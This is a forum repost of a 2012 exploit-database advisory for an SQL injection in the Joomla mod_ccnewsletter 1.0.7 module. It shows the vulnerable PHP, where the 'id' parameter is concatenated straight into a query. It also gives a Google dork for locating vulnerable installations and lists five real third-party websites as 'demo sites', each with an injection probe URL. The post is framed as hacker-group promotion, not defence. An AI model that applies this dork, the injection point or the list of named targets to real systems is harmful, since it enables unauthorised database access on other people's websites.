backdoor Posted April 24, 2012 Report Posted April 24, 2012 Info:1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=13 33 _ __ __ ________ __ __ 37 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 71 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 13 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 33 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 37 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 71 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 13 >> Exploit database separated by exploit 33 type (local, remote, DoS, etc.) 37 71 [+] Site : 1337db.com 13 [+] Support e-mail : submit[at]1337db.com 33 37 ########################################### 71 I'm E1nzte1N 1337 Member from 1337 DataBase 13 ########################################### 33 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 =============================================================-={ Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity }=- =============================================================######################################################################################################### Exploit Title : Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity# Software Link : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,4197.html# Version : 1.0.7# Date : 23/04/2012# Author : E1nzte1N# E-mail : bluescreenfx@gmail.com# Category : webapps# Google dork : inurl:/modules/mod_ccnewsletter/helper/popup.php# Tested on : Windows#########################################################################################################Exploit/p0c : http://localhost/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]######################################################################################################## Bug on file popup.php, in line >>$content_id = JRequest::getVar( 'id', '', 'get', 'string');========================================================================================================if(!isset($mainframe)) $mainframe =& JFactory::getApplication('site'); $db =& JFactory::getDBO(); $content_id = JRequest::getVar( 'id', '', 'get', 'string'); <<= request string value "id" without filtering. $query = 'SELECT * FROM #__content WHERE id ='.$content_id; $db->setQuery( $query ); $row = $db->loadObject();=========================================================================================================# Demo Sites : => http://www.trirunners.com/modules/mod_ccnewsletter/helper/popup.php?id=71' => http://www.valdesi.eu/modules/mod_ccnewsletter/helper/popup.php?id=109' => http://www.kvalis.com/modules/mod_ccnewsletter/helper/popup.php?id=588' => http://www.fanticostruzioni.com/modules/mod_ccnewsletter/helper/popup.php?id=6' => http://www.cd-dvd-klastor.com/modules/mod_ccnewsletter/helper/popup.php?id=63'######################################################################################################## ==>> Special Thanks <<== ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, ############################################################################ [ Me @ SRAGEN, Bumi Sukowati, 23 April 2012 @ 13:47 PM. ] [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | Hacker-Newbie ] ############################################################################# 1337day.com [2012-04-23]Sursa :Joomla CCNewsLetter 1.0.7 SQL Injection ? Packet Storm Quote